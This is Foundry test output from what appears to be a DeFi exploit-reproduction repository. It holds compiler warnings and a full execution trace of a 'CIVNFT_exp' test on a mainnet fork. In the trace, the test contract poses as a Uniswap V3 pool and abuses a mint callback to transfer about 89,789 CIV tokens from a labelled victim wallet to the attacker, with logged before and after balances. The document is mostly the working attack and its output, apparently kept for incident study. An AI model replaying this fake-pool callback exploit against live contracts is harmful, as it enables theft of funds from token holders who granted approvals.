Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.21s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-07/CIVNFT_exp.sol:40:5:
   |
40 |     IERC20 private constant WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-07/CIVNFT_exp.sol:86:9:
   |
86 |         address recipient,
   |         ^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-07/CIVNFT_exp.sol:87:9:
   |
87 |         int24 tickLower,
   |         ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-07/CIVNFT_exp.sol:88:9:
   |
88 |         int24 tickUpper,
   |         ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-07/CIVNFT_exp.sol:89:9:
   |
89 |         uint128 amount,
   |         ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-07/CIVNFT_exp.sol:90:9:
   |
90 |         bytes calldata data
   |         ^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-07/CIVNFT_exp.sol:91:25:
   |
91 |     ) external returns (uint256 amount0, uint256 amount1) {
   |                         ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-07/CIVNFT_exp.sol:91:42:
   |
91 |     ) external returns (uint256 amount0, uint256 amount1) {
   |                                          ^^^^^^^^^^^^^^^

Warning (2018): Function state mutability can be restricted to pure
  --> src/test/2023-07/CIVNFT_exp.sol:61:5:
   |
61 |     function token0() external view returns (address) {
   |     ^ (Relevant source part starts here and spans across multiple lines).

Warning (2018): Function state mutability can be restricted to pure
  --> src/test/2023-07/CIVNFT_exp.sol:65:5:
   |
65 |     function token1() external view returns (address) {
   |     ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 905.75ms (3.89ms CPU time)

Ran 1 test for src/test/2023-07/CIVNFT_exp.sol:CIVNFTTest
[PASS] testExploit() (gas: 443490)
Logs:
  Attacker CIV balance before exploit: 0.000000000000000000
  Attacker CIV balance after exploit: 89789.154803441368766010

Traces:
  [9449] CIVNFTTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 17649875 [1.764e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(CIV: [0x37fE0f067FA808fFBDd12891C0858532CFE7361d], "CIV")
    │   └─ ← [Return]
    ├─ [0] VM::label(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], "WETH")
    │   └─ ← [Return]
    ├─ [0] VM::label(CIVNFT: [0xF169BD68ED72B2fdC3C9234833197171AA000580], "CIVNFT")
    │   └─ ← [Return]
    ├─ [0] VM::label(victim: [0x512e9701D314b365921BcB3b8265658A152C9fFD], "victim")
    │   └─ ← [Return]
    └─ ← [Stop]

  [468190] CIVNFTTest::testExploit()
    ├─ [2863] CIV::balanceOf(CIVNFTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [432] CIV::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker CIV balance before exploit", val: 0, decimals: 18)
    ├─ [447210] CIVNFT::7ca06d68(0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e149600000000000000000000000000000000000000000000000000000000000000c0fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe8397000000000000000000000000000000000000000000002964d28008383a2d6d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000008302e303030303539000000000000000000000000000000000000000000000000)
    │   ├─ [439843] 0x78bd317a87d2Eab65b666e9402182A949Ab4EeB9::7ca06d68(0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e149600000000000000000000000000000000000000000000000000000000000000c0fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe8397000000000000000000000000000000000000000000002964d28008383a2d6d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000008302e303030303539000000000000000000000000000000000000000000000000) [delegatecall]
    │   │   ├─ [384] CIVNFTTest::tickSpacing() [staticcall]
    │   │   │   └─ ← [Return] 60
    │   │   ├─ [1504] CIVNFTTest::slot0() [staticcall]
    │   │   │   └─ ← [Return] Slot0({ sqrtPriceX96: 590212530842204246875907781 [5.902e26], tick: -97380 [-9.738e4], observationIndex: 0, observationCardinality: 1, observationCardinalityNext: 1, feeProtocol: 0, unlocked: true })
    │   │   ├─ [48622] CIVNFTTest::mint(CIVNFT: [0xF169BD68ED72B2fdC3C9234833197171AA000580], -97440 [-9.744e4], -97380 [-9.738e4], 499885050972117170683107 [4.998e23], 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496)
    │   │   │   ├─ [2863] CIV::balanceOf(victim: [0x512e9701D314b365921BcB3b8265658A152C9fFD]) [staticcall]
    │   │   │   │   └─ ← [Return] 89789154803441368766010 [8.978e22]
    │   │   │   ├─ [41002] CIVNFT::uniswapV3MintCallback(89789154803441368766010 [8.978e22], 0, 0x000000000000000000000000512e9701d314b365921bcb3b8265658a152c9ffd000000000000000000000000512e9701d314b365921bcb3b8265658a152c9ffd)
    │   │   │   │   ├─ [40147] 0x78bd317a87d2Eab65b666e9402182A949Ab4EeB9::uniswapV3MintCallback(89789154803441368766010 [8.978e22], 0, 0x000000000000000000000000512e9701d314b365921bcb3b8265658a152c9ffd000000000000000000000000512e9701d314b365921bcb3b8265658a152c9ffd) [delegatecall]
    │   │   │   │   │   ├─ [426] CIVNFTTest::token0() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] CIV: [0x37fE0f067FA808fFBDd12891C0858532CFE7361d]
    │   │   │   │   │   ├─ [446] CIVNFTTest::token1() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2]
    │   │   │   │   │   ├─ [34792] CIV::transferFrom(victim: [0x512e9701D314b365921BcB3b8265658A152C9fFD], CIVNFTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 89789154803441368766010 [8.978e22])
    │   │   │   │   │   │   ├─ emit Transfer(from: victim: [0x512e9701D314b365921BcB3b8265658A152C9fFD], to: CIVNFTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 89789154803441368766010 [8.978e22])
    │   │   │   │   │   │   ├─ emit Approval(owner: victim: [0x512e9701D314b365921BcB3b8265658A152C9fFD], spender: CIVNFT: [0xF169BD68ED72B2fdC3C9234833197171AA000580], value: 115792089237316195423570985008687907853269984665640563849668429204471760873925 [1.157e77])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xe746e20a49628a1e264010b856f56a5a82acdd389dec27ab5033f4103a49e578: 0x0000000000000000000000000000000000000000000013037ad67a66319f163a → 0
    │   │   │   │   │   │   │   @ 0x839aa5c6062c3037e64d682d543c8cd50c4071ecde400b47e604cafa9fb2b3ba: 0xffffffffffffffffffffffffffffffffffffffffffffead2fd381eb5097fffff → 0xffffffffffffffffffffffffffffffffffffffffffffd7cf8261a44ed7e0e9c5
    │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000000013037ad67a66319f163a
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 252: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496 → 0
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return]
    │   │   │   └─ ← [Return] 0, 0
    │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: CIVNFTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], tokenId: 61)
    │   │   ├─  emit topic 0: 0xbff6bec5c31e8419bd3fbc20f32b7e3695a58230657995a2b7d09634acf9efea
    │   │   │           data: 0x000000000000000000000000000000000000000000000000000000000000003d0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   ├─  storage changes:
    │   │   │   @ 0x5584c29a9185df152b885fdef10a7e37563cc5155636e3178d733a1c57cd8568: 0 → 0x302e303030303539000000000000000000000000000000000000000000000010
    │   │   │   @ 0xfa62042c94b1d836c3640cb5f5f4cfcf1743d5d821d23c42e21d7d19e23a11e7: 0 → 1
    │   │   │   @ 0x5584c29a9185df152b885fdef10a7e37563cc5155636e3178d733a1c57cd8563: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   @ 0xc050ca3f2c96cf57b947b1347c6d47e7f0fad02bb7266f169d767200c1b889d9: 0 → 0x2f516d647056623231664d37566968556e523838314b48716b71317038335553
    │   │   │   @ 0x46501879b8ca8525e8c2fd519e2fbfcfa2ebea26501294aa02cbfcfb12e943ce: 0 → 61
    │   │   │   @ 0x81e8f1b046ad5429be3fddb5a5df6cce0ec52e6c5ffe0f21c2579796210cd03d: 0 → 159
    │   │   │   @ 252: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   @ 0x658aa45a13be6bfcea3375e10c871d5d05ac780dc7b66b38c1f40953dd827592: 0 → 1
    │   │   │   @ 0x5584c29a9185df152b885fdef10a7e37563cc5155636e3178d733a1c57cd8566: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   @ 0xc050ca3f2c96cf57b947b1347c6d47e7f0fad02bb7266f169d767200c1b889da: 0 → 0x6341325634594e64545078627557770000000000000000000000000000000000
    │   │   │   @ 0x8e2d78d989c35870d25aaa5f93c8f97f90595a24b93cb10551cc9ad9abddc814: 0 → 0x0000000001050100000000000069dad2aa6aa177fc7ce3fe839cfe8360fe839c
    │   │   │   @ 0x46501879b8ca8525e8c2fd519e2fbfcfa2ebea26501294aa02cbfcfb12e943cf: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   @ 0x43a43490fb949f9b1d240a3219124d16bb2cf1ad396991a8b6d382e4f0e31f9b: 0 → 62
    │   │   │   @ 0x5584c29a9185df152b885fdef10a7e37563cc5155636e3178d733a1c57cd8567: 0 → 0x0000000000000000000000000000000000000000000000000000000064a97dc7
    │   │   │   @ 0x979809b5622c379dfd2a7414363386279283d58b9d7591faa1ed17ce57694ed6: 0 → 61
    │   │   │   @ 102: 61 → 62
    │   │   │   @ 0xc050ca3f2c96cf57b947b1347c6d47e7f0fad02bb7266f169d767200c1b889d8: 0 → 0x68747470733a2f2f636c6f7564666c6172652d697066732e636f6d2f69706673
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [863] CIV::balanceOf(CIVNFTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 89789154803441368766010 [8.978e22]
    ├─ [432] CIV::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker CIV balance after exploit", val: 89789154803441368766010 [8.978e22], decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 14.13s (10.90s CPU time)

Ran 2 test suites in 15.30s (15.03s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
